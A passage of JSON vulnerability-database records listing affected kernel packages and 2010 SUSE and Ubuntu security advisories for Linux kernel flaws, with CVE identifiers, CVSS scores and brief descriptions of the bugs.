"2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-pae-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-pae", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-pae-devel-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-pae-devel", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "x86_64", "packageFilename": "kernel-default-debuginfo-2.6.31.12-0.1.1.x86_64.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-trace-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-trace", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-trace-base-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-trace-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-default-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-default-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-vanilla-base-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-vanilla-base", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-default-devel-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-default-devel-debuginfo", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "1.1_2.6.31.12_0.1-6.9.12", "arch": "x86_64", "packageFilename": "preload-kmp-default-1.1_2.6.31.12_0.1-6.9.12.x86_64.rpm", "packageName": "preload-kmp-default", "operator": "lt"}, {"OS": "openSUSE", "OSVersion": "11.2", "packageVersion": "2.6.31.12-0.1.1", "arch": "i586", "packageFilename": "kernel-trace-base-debuginfo-2.6.31.12-0.1.1.i586.rpm", "packageName": "kernel-trace-base-debuginfo", "operator": "lt"}], "description": "This update of the openSUSE 11.2 kernel brings the kernel to version 2.6.31.12 and contains a lot of bug and security fixes.\n#### Solution\nThere is no known workaround, please install the update packages.", "edition": 1, "reporter": "Suse", "published": "2010-02-08T17:19:31", "title": "remote denial of service in kernel", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "suse", "bulletinFamily": "unix", "cvelist": ["CVE-2009-3939", "CVE-2010-0007", "CVE-2009-4141", "CVE-2009-4538", "CVE-2010-0299", "CVE-2009-4536", "CVE-2010-0003", "CVE-2010-0006"], "modified": "2010-02-08T17:19:31", "id": "SUSE-SA:2010:010", "href": "http://lists.opensuse.org/opensuse-security-announce/2010-02/msg00002.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2018-08-31T00:08:20", "references": ["https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4020", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4138", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4308", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0291", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4021", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4536", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0003", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0006", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4538", "https://people.canonical.com/~ubuntu-security/cve/CVE-2010-0007", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4141", "https://people.canonical.com/~ubuntu-security/cve/CVE-2009-4031"], "affectedPackage": [{"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-itanium-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-686", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-server", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-lpiacompat", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-itanium", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-amd64-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-19.56", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-19-sparc64", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-lpia", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-mckinley", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-108.21", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-108-imx51", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-powerpc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-19.56", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-19-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "2.6.27-17.45", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.27-17-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-itanium", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-amd64-server", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "2.6.28-18.59", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.28-18-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "2.6.28-18.59", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.28-18-ixp4xx", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-19.56", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-19-server", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-19.56", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-19-lpia", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-19.56", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-19-sparc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "2.6.28-18.59", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.28-18-versatile", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-304.10", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-304-ec2", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-mckinley-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-k7", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "2.6.28-18.59", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.28-18-iop32x", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-19.56", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-19-powerpc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-hppa32", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "2.6.27-17.45", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.27-17-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.10", "packageVersion": "2.6.27-17.45", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.27-17-server", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-19.56", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-19-ia64", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-rt", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-server-bigiron", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "2.6.28-18.59", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.28-18-server", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-server", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-19.56", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-19-386", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-hppa32", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-19.56", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-19-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-386", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-powerpc-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-19.56", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-19-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-xen", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-19.56", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-19-generic-pae", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-sparc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-hppa64", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-211.22", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-211-dove-z0", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-sparc64", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-386", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "2.6.28-18.59", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.28-18-lpia", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-sparc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-powerpc64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-hppa32-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-amd64-k8", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "2.6.28-18.59", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.28-18-virtual", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-powerpc", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-211.22", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-211-dove", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-hppa64", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-openvz", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-hppa64-smp", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-sparc64", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-mckinley", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.04", "packageVersion": "2.6.28-18.59", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.28-18-imx51", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "6.06", "packageVersion": "2.6.15-55.82", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.15-55-amd64-xeon", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "8.04", "packageVersion": "2.6.24-27.65", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.24-27-generic", "operator": "lt"}, {"OS": "Ubuntu", "OSVersion": "9.10", "packageVersion": "2.6.31-19.56", "arch": "noarch", "packageFilename": "UNKNOWN", "packageName": "linux-image-2.6.31-19-powerpc64-smp", "operator": "lt"}], "description": "Amerigo Wang and Eric Sesterhenn discovered that the HFS and ext4 filesystems did not correctly check certain disk structures. If a user were tricked into mounting a specially crafted filesystem, a remote attacker could crash the system or gain root privileges. (CVE-2009-4020, CVE-2009-4308)\n\nIt was discovered that FUSE did not correctly check certain requests. A local attacker with access to FUSE mounts could exploit this to crash the system or possibly gain root privileges. Ubuntu 9.10 was not affected. (CVE-2009-4021)\n\nIt was discovered that KVM did not correctly decode certain guest instructions. A local attacker in a guest could exploit this to trigger high scheduling latency in the host, leading to a denial of service. Ubuntu 6.06 was not affected. (CVE-2009-4031)\n\nIt was discovered that the OHCI fireware driver did not correctly handle certain ioctls. A local attacker could exploit this to crash the system, or possibly gain root privileges. Ubuntu 6.06 was not affected. (CVE-2009-4138)\n\nTavis Ormandy discovered that the kernel did not correctly handle O_ASYNC on locked files. A local attacker could exploit this to gain root privileges. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2009-4141)\n\nNeil Horman and Eugene Teo discovered that the e1000 and e1000e network drivers did not correctly check the size of Ethernet frames. An attacker on the local network could send specially crafted traffic to bypass packet filters, crash the system, or possibly gain root privileges. (CVE-2009-4536, CVE-2009-4538)\n\nIt was discovered that \u201cprint-fatal-signals\u201d reporting could show arbitrary kernel memory contents. A local attacker could exploit this, leading to a loss of privacy. By default this is disabled in Ubuntu and did not affect Ubuntu 6.06. (CVE-2010-0003)\n\nOlli Jarva and Tuomo Untinen discovered that IPv6 did not correctly handle jumbo frames. A remote attacker could exploit this to crash the system, leading to a denial of service. Only Ubuntu 9.04 and 9.10 were affected. (CVE-2010-0006)\n\nFlorian Westphal discovered that bridging netfilter rules could be modified by unprivileged users. A local attacker could disrupt network traffic, leading to a denial of service. (CVE-2010-0007)\n\nAl Viro discovered that certain mremap operations could leak kernel memory. A local attacker could exploit this to consume all available memory, leading to a denial of service. (CVE-2010-0291)", "edition": 3, "reporter": "Ubuntu", "published": "2010-02-05T00:00:00", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0007", "CVE-2009-4141", "CVE-2010-0291", "CVE-2009-4538", "CVE-2009-4020", "CVE-2009-4536", "CVE-2009-4308", "CVE-2009-4021", "CVE-2010-0003", "CVE-2009-4031", "CVE-2010-0006", "CVE-2009-4138"], "modified": "2010-02-05T00:00:00", "id": "USN-894-1", "href": "https://usn.ubuntu.com/894-1/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "oraclelinux": [{"lastseen": "2018-08-31T01:43:54", "references": [], "affectedPackage": [{"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5xen-1.4.4-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5-2.0.5-1.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5xen-1.4.4-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "ia64", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5debug-2.0.5-1.el5.ia64.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-164.11.1.0.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-164.11.1.0.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "src", "packageFilename": "kernel-2.6.18-164.11.1.0.1.el5.src.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-2.6.18-164.11.1.0.1.el5.ia64.rpm", "packageName": "kernel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-164.11.1.0.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-164.11.1.0.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "noarch", "packageFilename": "kernel-doc-2.6.18-164.11.1.0.1.el5.noarch.rpm", "packageName": "kernel-doc", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5xen-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "ia64", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5debug-1.4.4-1.el5.ia64.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "i686", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5debug-2.0.5-1.el5.i686.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5-2.0.5-1.el5.src.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5-2.0.5-1.el5.src.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "src", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5-2.0.5-1.el5.src.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-debug-2.6.18-164.11.1.0.1.el5.x86_64.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5xen-2.0.5-1.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "i686", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5xen-1.4.4-1.el5.i686.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-PAE-2.6.18-164.11.1.0.1.el5.i686.rpm", "packageName": "kernel-PAE", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-devel-2.6.18-164.11.1.0.1.el5.x86_64.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "ia64", "packageFilename": "kernel-debug-devel-2.6.18-164.11.1.0.1.el5.ia64.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-xen-2.6.18-164.11.1.0.1.el5.i686.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-devel-2.6.18-164.11.1.0.1.el5.x86_64.rpm", "packageName": "kernel-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5-1.4.4-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5-1.4.4-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "src", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5-1.4.4-1.el5.src.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.0.5-1.el5", "arch": "x86_64", "packageFilename": "oracleasm-2.6.18-164.11.1.0.1.el5debug-2.0.5-1.el5.x86_64.rpm", "packageName": "oracleasm-2.6.18-164.11.1.0.1.el5debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "1.4.4-1.el5", "arch": "x86_64", "packageFilename": "ocfs2-2.6.18-164.11.1.0.1.el5-1.4.4-1.el5.x86_64.rpm", "packageName": "ocfs2-2.6.18-164.11.1.0.1.el5", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-xen-devel-2.6.18-164.11.1.0.1.el5.i686.rpm", "packageName": "kernel-xen-devel", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-debug-2.6.18-164.11.1.0.1.el5.i686.rpm", "packageName": "kernel-debug", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "x86_64", "packageFilename": "kernel-xen-2.6.18-164.11.1.0.1.el5.x86_64.rpm", "packageName": "kernel-xen", "operator": "lt"}, {"OS": "Oracle Linux", "OSVersion": "5", "packageVersion": "2.6.18-164.11.1.0.1.el5", "arch": "i686", "packageFilename": "kernel-debug-devel-2.6.18-164.11.1.0.1.el5.i686.rpm", "packageName": "kernel-debug-devel", "operator": "lt"}, {"OS": 